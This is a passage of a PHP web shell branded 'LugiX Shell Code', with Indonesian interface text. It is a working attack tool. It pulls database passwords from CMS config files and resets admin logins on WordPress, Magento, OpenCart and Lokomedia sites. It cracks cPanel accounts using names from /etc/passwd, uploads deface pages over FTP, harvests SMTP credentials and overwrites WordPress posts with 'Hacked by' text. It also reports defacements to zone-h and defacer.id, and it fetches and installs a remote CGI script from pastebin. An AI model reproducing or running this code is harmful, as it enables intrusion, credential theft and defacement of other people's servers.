  1764.                         echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1765.                     }
  1766.                     mysql_close($conn);
  1767.                 } elseif(preg_match("/WordPress/",$config)) {
  1768.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1769.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1770.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1771.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1772.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1773.                     $prefix = $dbprefix."users";
  1774.                     $option = $dbprefix."options";
  1775.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1776.                     $db = mysql_select_db($dbname);
  1777.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1778.                     $result = mysql_fetch_array($q);
  1779.                     $id = $result[ID];
  1780.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1781.                     $result2 = mysql_fetch_array($q2);
  1782.                     $target = $result2[option_value];
  1783.                     if($target == '') {
  1784.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1785.                     } else {
  1786.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1787.                     }
  1788.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1789.                     echo "Config => ".$file_conf."<br>";
  1790.                     echo "CMS => Wordpress<br>";
  1791.                     echo $url_target;
  1792.                     if(!$update OR !$conn OR !$db) {
  1793.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1794.                     } else {
  1795.                         echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1796.                     }
  1797.                     mysql_close($conn);
  1798.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1799.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1800.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1801.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1802.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1803.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1804.                     $prefix = $dbprefix."admin_user";
  1805.                     $option = $dbprefix."core_config_data";
  1806.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1807.                     $db = mysql_select_db($dbname);
  1808.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1809.                     $result = mysql_fetch_array($q);
  1810.                     $id = $result[user_id];
  1811.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1812.                     $result2 = mysql_fetch_array($q2);
  1813.                     $target = $result2[value];
  1814.                     if($target == '') {
  1815.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1816.                     } else {
  1817.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1818.                     }
  1819.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1820.                     echo "Config => ".$file_conf."<br>";
  1821.                     echo "CMS => Magento<br>";
  1822.                     echo $url_target;
  1823.                     if(!$update OR !$conn OR !$db) {
  1824.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1825.                     } else {
  1826.                         echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1827.                     }
  1828.                     mysql_close($conn);
  1829.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1830.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1831.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1832.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1833.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1834.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1835.                     $prefix = $dbprefix."user";
  1836.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1837.                     $db = mysql_select_db($dbname);
  1838.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1839.                     $result = mysql_fetch_array($q);
  1840.                     $id = $result[user_id];
  1841.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1842.                     if($target == '') {
  1843.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1844.                     } else {
  1845.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1846.                     }
  1847.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1848.                     echo "Config => ".$file_conf."<br>";
  1849.                     echo "CMS => OpenCart<br>";
  1850.                     echo $url_target;
  1851.                     if(!$update OR !$conn OR !$db) {
  1852.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1853.                     } else {
  1854.                         echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1855.                     }
  1856.                     mysql_close($conn);
  1857.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1858.                     $dbhost = ambilkata($config,'server = "','"');
  1859.                     $dbuser = ambilkata($config,'username = "','"');
  1860.                     $dbpass = ambilkata($config,'password = "','"');
  1861.                     $dbname = ambilkata($config,'database = "','"');
  1862.                     $prefix = "users";
  1863.                     $option = "identitas";
  1864.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1865.                     $db = mysql_select_db($dbname);
  1866.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1867.                     $result = mysql_fetch_array($q);
  1868.                     $target = $result[alamat_website];
  1869.                     if($target == '') {
  1870.                         $target2 = $result[url];
  1871.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1872.                         if($target2 == '') {
  1873.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1874.                         } else {
  1875.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1876.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1877.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1878.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1879.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1880.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1881.                             } else {
  1882.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1883.                             }
  1884.                         }
  1885.                     } else {
  1886.                         $cek_login = file_get_contents("$target/adminweb/");
  1887.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1888.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1889.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1890.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1891.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1892.                         } else {
  1893.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1894.                         }
  1895.                     }
  1896.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1897.                     echo "Config => ".$file_conf."<br>";
  1898.                     echo "CMS => Lokomedia<br>";
  1899.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1900.                         echo $url_target2;
  1901.                     } else {
  1902.                         echo $url_target;
  1903.                     }
  1904.                     if(!$update OR !$conn OR !$db) {
  1905.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1906.                     } else {
  1907.                         echo "Status => <font color=blue>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1908.                     }
  1909.                     mysql_close($conn);
  1910.                 }
  1911.             }
  1912.         }
  1913.     } else {
  1914.         echo "<center>
  1915.        <h1>Auto Edit User Config</h1>
  1916.        <form method='post'>
  1917.        DIR Config: <br>
  1918.        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1919.        Set User & Pass: <br>
  1920.        <input type='text' name='user_baru' value='N45HT' placeholder='user_baru'><br>
  1921.        <input type='text' name='pass_baru' value='N45HT' placeholder='pass_baru'><br>
  1922.        <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1923.        </form>
  1924.        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1925.        ";
  1926.     }
  1927. } elseif($_GET['do'] == 'cpanel') {
  1928.     if($_POST['crack']) {
  1929.         $usercp = explode("\r\n", $_POST['user_cp']);
  1930.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1931.         $i = 0;
  1932.         foreach($usercp as $ucp) {
  1933.             foreach($passcp as $pcp) {
  1934.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1935.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1936.                     } else {
  1937.                         $_SESSION[$ucp] = "1";
  1938.                         $_SESSION[$pcp] = "1";
  1939.                         if($ucp == '' || $pcp == '') {
  1940.                            
  1941.                         } else {
  1942.                             $i++;
  1943.                             if(function_exists('posix_getpwuid')) {
  1944.                                 $domain_cp = file_get_contents("/etc/named.conf");
  1945.                                 if($domain_cp == '') {
  1946.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  1947.                                 } else {
  1948.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1949.                                     foreach($domains_cp[1] as $dj) {
  1950.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1951.                                         $user_cp_url = $user_cp_url['name'];
  1952.                                         if($user_cp_url == $ucp) {
  1953.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=blue>$dj</font></a>";
  1954.                                             break;
  1955.                                         }
  1956.                                     }
  1957.                                 }
  1958.                             } else {
  1959.                                 $dom = "<font color=red>function is Disable by system</font>";
  1960.                             }
  1961.                             echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>) domain ($dom)<br>";
  1962.                         }
  1963.                     }
  1964.                 }
  1965.             }
  1966.         }
  1967.         if($i == 0) {
  1968.         } else {
  1969.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=blue>LugiX Shell Code.</font>";
  1970.         }
  1971.     } else {
  1972.         echo "<center>
  1973.        <form method='post'>
  1974.        USER: <br>
  1975.        <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1976.         $_usercp = fopen("/etc/passwd","r");
  1977.         while($getu = fgets($_usercp)) {
  1978.             if($getu == '' || !$_usercp) {
  1979.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1980.             } else {
  1981.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1982.                 foreach($u[1] as $user_cp) {
  1983.                         if(is_dir("/home/$user_cp/public_html")) {
  1984.                             echo "$user_cp\n";
  1985.                     }
  1986.                 }
  1987.             }
  1988.         }
  1989.         echo "</textarea><br>
  1990.        PASS: <br>
  1991.        <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1992.         function cp_pass($dir) {
  1993.             $pass = "";
  1994.             $dira = scandir($dir);
  1995.             foreach($dira as $dirb) {
  1996.                 if(!is_file("$dir/$dirb")) continue;
  1997.                 $ambil = file_get_contents("$dir/$dirb");
  1998.                 if(preg_match("/WordPress/", $ambil)) {
  1999.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2000.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2001.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2002.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2003.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2004.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2005.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2006.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2007.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2008.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  2009.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  2010.                     if(preg_match('/"/', $pass1[1])) {
  2011.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2012.                         $pass .= $pass1[1]."\n";
  2013.                     } else {
  2014.                         $pass .= $pass1[1]."\n";
  2015.                     }
  2016.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2017.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2018.                 }
  2019.             }
  2020.             echo $pass;
  2021.         }
  2022.         $cp_pass = cp_pass($dir);
  2023.         echo $cp_pass;
  2024.         echo "</textarea><br>
  2025.        <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2026.        </form>
  2027.        <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2028.     }
  2029. } elseif($_GET['do'] == 'cpftp_auto') {
  2030.     if($_POST['crack']) {
  2031.         $usercp = explode("\r\n", $_POST['user_cp']);
  2032.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2033.         $i = 0;
  2034.         foreach($usercp as $ucp) {
  2035.             foreach($passcp as $pcp) {
  2036.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2037.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2038.                     } else {
  2039.                         $_SESSION[$ucp] = "1";
  2040.                         $_SESSION[$pcp] = "1";
  2041.                         if($ucp == '' || $pcp == '') {
  2042.                             //
  2043.                         } else {
  2044.                             echo "[+] username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>)<br>";
  2045.                             $ftp_conn = ftp_connect($ip);
  2046.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  2047.                             if((!$ftp_login) || (!$ftp_conn)) {
  2048.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  2049.                             } else {
  2050.                                 echo "[+] <font color=blue>Login Sukses</font><br>";
  2051.                                 $fi = htmlspecialchars($_POST['file_deface']);
  2052.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  2053.                                 if($deface) {
  2054.                                     $i++;
  2055.                                     echo "[+] <font color=blue>Deface Sukses</font><br>";
  2056.                                     if(function_exists('posix_getpwuid')) {
  2057.                                         $domain_cp = file_get_contents("/etc/named.conf");
  2058.                                         if($domain_cp == '') {
  2059.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2060.                                         } else {
  2061.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2062.                                             foreach($domains_cp[1] as $dj) {
  2063.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2064.                                                 $user_cp_url = $user_cp_url['name'];
  2065.                                                 if($user_cp_url == $ucp) {
  2066.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  2067.                                                     break;
  2068.                                                 }
  2069.                                             }
  2070.                                         }
  2071.                                     } else {
  2072.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2073.                                     }
  2074.                                 } else {
  2075.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  2076.                                 }
  2077.                             }
  2078.                             //echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>)<br>";
  2079.                         }
  2080.                     }
  2081.                 }
  2082.             }
  2083.         }
  2084.         if($i == 0) {
  2085.         } else {
  2086.             echo "<br>sukses deface ".$i." Cpanel by <font color=blue>Lugix Shell Code.</font>";
  2087.         }
  2088.     } else {
  2089.         echo "<center>
  2090.        <form method='post'>
  2091.        Filename: <br>
  2092.        <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  2093.        Deface Page: <br>
  2094.        <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  2095.        USER: <br>
  2096.        <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2097.         $_usercp = fopen("/etc/passwd","r");
  2098.         while($getu = fgets($_usercp)) {
  2099.             if($getu == '' || !$_usercp) {
  2100.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2101.             } else {
  2102.                 preg_match_all("/(.*?):x:/", $getu, $u);
  2103.                 foreach($u[1] as $user_cp) {
  2104.                         if(is_dir("/home/$user_cp/public_html")) {
  2105.                             echo "$user_cp\n";
  2106.                     }
  2107.                 }
  2108.             }
  2109.         }
  2110.         echo "</textarea><br>
  2111.        PASS: <br>
  2112.        <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2113.         function cp_pass($dir) {
  2114.             $pass = "";
  2115.             $dira = scandir($dir);
  2116.             foreach($dira as $dirb) {
  2117.                 if(!is_file("$dir/$dirb")) continue;
  2118.                 $ambil = file_get_contents("$dir/$dirb");
  2119.                 if(preg_match("/WordPress/", $ambil)) {
  2120.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2121.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2122.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  2123.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2124.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2125.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2126.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  2127.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2128.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2129.                 } elseif(preg_match("/client/", $ambil)) {
  2130.                     preg_match("/password=(.*)/", $ambil, $pass1);
  2131.                     if(preg_match('/"/', $pass1[1])) {
  2132.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  2133.                         $pass .= $pass1[1]."\n";
  2134.                     }
  2135.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2136.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2137.                 }
  2138.             }
  2139.             echo $pass;
  2140.         }
  2141.         $cp_pass = cp_pass($dir);
  2142.         echo $cp_pass;
  2143.         echo "</textarea><br>
  2144.        <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  2145.        </form>
  2146.        <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2147.     }
  2148. } elseif($_GET['do'] == 'smtp') {
  2149.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2150.     function scj($dir) {
  2151.         $dira = scandir($dir);
  2152.         foreach($dira as $dirb) {
  2153.             if(!is_file("$dir/$dirb")) continue;
  2154.             $ambil = file_get_contents("$dir/$dirb");
  2155.             $ambil = str_replace("$", "", $ambil);
  2156.             if(preg_match("/JConfig|joomla/", $ambil)) {
  2157.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2158.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2159.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2160.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2161.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2162.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2163.                 echo "SMTP Host: <font color=blue>$smtp_host</font><br>";
  2164.                 echo "SMTP port: <font color=blue>$smtp_port</font><br>";
  2165.                 echo "SMTP user: <font color=blue>$smtp_user</font><br>";
  2166.                 echo "SMTP pass: <font color=blue>$smtp_pass</font><br>";
  2167.                 echo "SMTP auth: <font color=blue>$smtp_auth</font><br>";
  2168.                 echo "SMTP secure: <font color=blue>$smtp_secure</font><br><br>";
  2169.             }
  2170.         }
  2171.     }
  2172.     $smpt_hunter = scj($dir);
  2173.     echo $smpt_hunter;
  2174. } elseif($_GET['do'] == 'auto_wp') {
  2175.     if($_POST['hajar']) {
  2176.         $title = htmlspecialchars($_POST['new_title']);
  2177.         $pn_title = str_replace(" ", "-", $title);
  2178.         if($_POST['cek_edit'] == "Y") {
  2179.             $script = $_POST['edit_content'];
  2180.         } else {
  2181.             $script = $title;
  2182.         }
  2183.         $conf = $_POST['config_dir'];
  2184.         $scan_conf = scandir($conf);
  2185.         foreach($scan_conf as $file_conf) {
  2186.             if(!is_file("$conf/$file_conf")) continue;
  2187.             $config = file_get_contents("$conf/$file_conf");
  2188.             if(preg_match("/WordPress/", $config)) {
  2189.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2190.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2191.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2192.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2193.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2194.                 $prefix = $dbprefix."posts";
  2195.                 $option = $dbprefix."options";
  2196.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2197.                 $db = mysql_select_db($dbname);
  2198.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2199.                 $result = mysql_fetch_array($q);
  2200.                 $id = $result[ID];
  2201.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2202.                 $result2 = mysql_fetch_array($q2);
  2203.                 $target = $result2[option_value];
  2204.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2205.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2206.                 echo "<div style='margin: 5px auto;'>";
  2207.                 if($target == '') {
  2208.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2209.                 } else {
  2210.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2211.                 }
  2212.                 if(!$update OR !$conn OR !$db) {
  2213.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2214.                 } else {
  2215.                     echo "<font color=blue>sukses di ganti.</font><br>";
  2216.                 }
  2217.                 echo "</div>";
  2218.                 mysql_close($conn);
  2219.             }
  2220.         }
  2221.     } else {
  2222.         echo "<center>
  2223.        <h1>Auto Edit Title+Content WordPress</h1>
  2224.        <form method='post'>
  2225.        DIR Config: <br>
  2226.        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2227.        Set Title: <br>
  2228.        <input type='text' name='new_title' value='Hacked by LugiX SHell Code' placeholder='New Title'><br><br>
  2229.        Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2230.        <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2231.        <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2232.        <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2233.        </form>
  2234.        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2235.        ";
  2236.     }
  2237. }elseif($_GET['do'] == 'defacerid') {
  2238. echo "<center><form method='post'>
  2239.        <u>Defacer</u>: <br>
  2240.        <input type='text' name='hekel' size='50' value='Your Nick'><br>
  2241.        <u>Team</u>: <br>
  2242.        <input type='text' name='tim' size='50' value='N45HT'><br>
  2243.        <u>Domains</u>: <br>
  2244.        <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2245.        <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2246.        </form>";
  2247. $site = explode("\r\n", $_POST['sites']);
  2248. $go = $_POST['go'];
  2249. $hekel = $_POST['hekel'];
  2250. $tim = $_POST['tim'];
  2251. if($go) {
  2252. foreach($site as $sites) {
  2253. $zh = $sites;
  2254. $form_url = "https://www.defacer.id/notify";
  2255. $data_to_post = array();
  2256. $data_to_post['attacker'] = "$hekel";
  2257. $data_to_post['team'] = "$tim";
  2258. $data_to_post['poc'] = 'SQL Injection';
  2259. $data_to_post['url'] = "$zh";
  2260. $curl = curl_init();
  2261. curl_setopt($curl,CURLOPT_URL, $form_url);
  2262. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2263. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2264. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2265. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2266. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2267. $result = curl_exec($curl);
  2268. echo $result;
  2269. curl_close($curl);
  2270. echo "<br>";
  2271. }
  2272. }
  2273. } elseif($_GET['do'] == 'zoneh') {
  2274.     if($_POST['submit']) {
  2275.         $domain = explode("\r\n", $_POST['url']);
  2276.         $nick =  $_POST['nick'];
  2277.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2278.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2279.         function zoneh($url,$nick) {
  2280.             $ch = curl_init("http://www.zone-h.com/notify/single");
  2281.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2282.                   curl_setopt($ch, CURLOPT_POST, true);
  2283.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2284.             return curl_exec($ch);
  2285.                   curl_close($ch);
  2286.         }
  2287.         foreach($domain as $url) {
  2288.             $zoneh = zoneh($url,$nick);
  2289.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2290.                 echo "$url -> <font color=blue>OK</font><br>";
  2291.             } else {
  2292.                 echo "$url -> <font color=red>ERROR</font><br>";
  2293.             }
  2294.         }
  2295.     } else {
  2296.         echo "<center><form method='post'>
  2297.        <u>Defacer</u>: <br>
  2298.        <input type='text' name='nick' size='50' value='Your Nick'><br>
  2299.        <u>Domains</u>: <br>
  2300.        <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2301.        <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2302.        </form>";
  2303.     }
  2304.     echo "</center>";
  2305. }
  2306. elseif($_GET['do'] == 'cgi') {
  2307.     $cgi_dir = mkdir('idx_cgi', 0755);
  2308.     $file_cgi = "idx_cgi/cgi.izo";
  2309.     $isi_htcgi = "AddHandler cgi-script .izo";
  2310.     $htcgi = fopen(".htaccess", "w");
  2311.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  2312.     $cgi = fopen($file_cgi, "w");
  2313.     fwrite($cgi, $cgi_script);
  2314.     fwrite($htcgi, $isi_htcgi);
  2315.     chmod($file_cgi, 0755);
  2316.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2317. } elseif($_GET['do'] == 'fake_root') {
  2318.     ob_start();
  2319.     $cwd = getcwd();
  2320.     $ambil_user = explode("/", $cwd);
  2321.     $user = $ambil_user[2];
  2322.     if($_POST['reverse']) {
  2323.         $site = explode("\r\n", $_POST['url']);
  2324.         $file = $_POST['file'];
  2325.         foreach($site as $url) {
  2326.             $cek = getsource("$url/~$user/$file");
  2327.             if(preg_match("/hacked/i", $cek)) {
  2328.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=blue>Fake Root!</font><br>";
  2329.             }
  2330.         }
  2331.     } else {
  2332.         echo "<center><form method='post'>
  2333.        Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  2334.        User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  2335.        Domain: <br>
  2336.        <textarea style='width: 450px; height: 250px;' name='url'>";
  2337.         reverse($_SERVER['HTTP_HOST']);
  2338.         echo "</textarea><br>
  2339.        <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  2340.        </form><br>
  2341.        NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  2342.     }
  2343. } elseif($_GET['do'] == 'symlink') {
  2344.  
  2345. @set_time_limit(0);
  2346.  
  2347. echo "<br><br><center><h1>Symlink</h1></center><br><br><center><div class=content>";
  2348.  
  2349. @mkdir('sym',0777);
